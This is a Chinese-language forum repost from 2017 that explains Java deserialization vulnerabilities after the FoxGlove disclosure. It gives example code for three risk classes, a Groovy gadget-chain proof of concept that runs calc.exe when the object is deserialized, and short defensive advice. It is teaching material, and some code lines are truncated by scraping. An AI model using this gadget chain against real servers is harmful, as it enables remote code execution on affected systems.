设为首页 收藏本站
查看: 1150|回复: 0

[经验分享] JAVA 反序列化攻击

[复制链接]

尚未签到

发表于 2017-2-19 08:34:27 | 显示全部楼层 |阅读模式
  Java 反序列化攻击漏洞由 FoxGlove 的最近的一篇博文爆出,该漏洞可以被黑客利用向服务器上传恶意脚本,或者远程执行命令。
  由于目前发现该漏洞存在于 Apache commons-collections, Apache xalan 和 Groovy 包中,也就意味着使用了这些包的服务器(目前发现有WebSphere, WebLogic,JBoss),第三方框架(Spring,Groovy),第三方应用(Jenkins),以及依赖于这些服务器,框架或者直接/间接引用这些包的应用都会受到威胁,这样的应用的数量会以百万计。
  说到漏洞存在的原因,根本还在于 Java 序列化自身的缺陷,众所周知,序列化的目的是使 Java 对象转化成字节流,方便存储或者网络上传输。Java 对象分解成字节码过程叫做序列化,从字节码组装成 Java 对象的过程叫做反序列化,这两个过程分别对应于的 writeObject 和 readObject 方法。问题在于 readObject 在利用字节流组装 Java 对象时不会调用构造函数, 也就意味着没有任何类型的检查,用户可以复写 readObject() 方法执行任何希望执行的代码。

这可能会导致三方面问题:
  1. 序列化对象修改了对象或者父类的某个未加保护的关键属性,导致未预料的结果。
  
例如:
  

class Client {  
private int value;
  
public Client(int v) {
  if (v <= 0) {
  throw new RuntimeException(&quot;not positive number&quot;);
  }
  value = v;
  }
  public void writeObject(ObjectOutputStream oos) throws IOException {
  int value = 0; //这里该值被改为0。(现实中可以通过调试模式,修改serialize字节码或者class instrument等多种方式修改该值)
  oos.defaultWriteObject();
  }
  
}
  
class Controller {
  private ArrayBlockingQueue<Client> queue;
  public void receiveState(ObjectInputStream o) throws IOException,>  Client s = (Client)o.readObject(); //反序列化不调用构造函数,value的非零检查不会触发
  queue.add(s);
  }
  public Client getClient() throws InterruptedException {
  return (Client)queue.take();
  }
  
}
  
class Server extends Thread {
  private Controller controller = new Controller();
  private int result = 100;
  public void run() {
  while (true) {
  try {
  result = result / controller.getClient().getValue(); // 由于value是0,会导致算数异常,线程结束
  Thread.sleep(100);
  } catch (InterruptedException e) {}
  }
  }
  
}
  

  2. 攻击者可以创建循环对象链,然后序列化。会导致反序列化无法结束, 空耗系统资源。例如:
  

Set root = new HashSet();  
Set s1 = root;
  
Set s2 = new HashSet();
  
for (int i = 0; i < 10; i++) {
  Set t1 = new HashSet();
  Set t2 = new HashSet();
  t1.add(&quot;foo&quot;); //使t2不等于t1
  s1.add(t1);
  s1.add(t2);
  s2.add(t1);
  s2.add(t2);
  s1 = t1;
  s2 = t2;
  
}
  

  3. 用户在收到序列化对象流时可以选择存储在本地,以后再处理。由于没有任何校验机制,使得上传恶意程序成为可能。
  

class Controller {  public void receiveState(ObjectInputStream ois) {
  FileOutputStream fos = new FileOutputStream(new File(&quot;xxx.ser&quot;));
  fos.write(ois); //实际并不知道存的是什么,可能是恶意脚本。
  fos.close();
  }
  
}
  

  那么这次由 FoxGlove 暴露出来的 Serialization Attack 具体是怎样呢?下面是 Groovy 的一个例子:
  

public>
public static void main(String[] args) throws Exception {
  final ConvertedClosure closure = new ConvertedClosure(new MethodClosure(&quot;calc.exe&quot;, &quot;execute&quot;), &quot;entrySet&quot;);
  Class<?>[] clsArr = {Map.class};
  final Map map = Map.class.cast(Proxy.newProxyInstance(GroovyTest.class.getClassLoader(), clsArr, closure));
  final Constructor<?> ctor =>  ctor.setAccessible(true);
  final InvocationHandler handler = (InvocationHandler)ctor.newInstance(Override.class, map);
  ByteArrayOutputStream bos = new ByteArrayOutputStream();
  ObjectOutputStream oos = new ObjectOutputStream(bos);
  oos.writeObject(handler);
  byte[] bytes = bos.toByteArray(); //对象被序列化
  ByteArrayInputStream bis = new ByteArrayInputStream(bytes);
  ObjectInputStream ois = new ObjectInputStream(bis);
  ois.readObject(); //反序列化时calc.exe被执行
  
}
  
}
  

  在这个例子中,ConvertedClosure 会把一个 Closure 对象映射成 Java 的 entrySet 方法,而在AnnotationInvocationHandler 的 readObject 方法中,会尝试调用 entrySet() 方法,这会触发 calc.exe 的调用。
  

private void readObject(ObjectInputStream var1) throws IOException,>var1.defaultReadObject();
  AnnotationType var2 = null;
  

  try {
  var2 = AnnotationType.getInstance(this.type);
  } catch (IllegalArgumentException var9) {
  throw new InvalidObjectException(&quot;Non-annotation type in annotation serial stream&quot;);
  }
  

  Map var3 = var2.memberTypes();
  Iterator var4 = this.memberValues.entrySet().iterator();
  

  while(var4.hasNext()) {
  Entry var5 = (Entry)var4.next();
  String var6 = (String)var5.getKey();
  Class var7 = (Class)var3.get(var6);
  if(var7 != null) {
  Object var8 = var5.getValue();
  if(!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) {
  var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + &quot;[&quot; + var8 + &quot;]&quot;)).setMember((Method)var2.members().get(var6)));
  }
  }
  }
  
}
  

  针对这个问题,FoxGlove Security 提到开发者不应该反序列化任何不信任的数据,而实际情况却是开发者对该问题的危害没有足够的认知,他提到一种激进的做法那就是如果你足够勇敢可以尝试扫描并删除存在反序列化漏洞的类,但是实际情况是第一没有人敢于冒这种风险,第二,当应用对象的依赖关系会很复杂,反序列化过程会导致很多关联对象被创建,所以扫描不能保证所有的问题类被发现。
  然而幸运的是,这个问题引起了一些安全公司的重视,在他们推出的 RASP(Runtime Application Security Protection)产品中会在应用运行期对该漏洞进行防护。
  本文转自 iyunv 官方博客
  

运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-344040-1-1.html 上篇帖子: Activemq 平台搭建与C#示列 下篇帖子: APM浅析
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表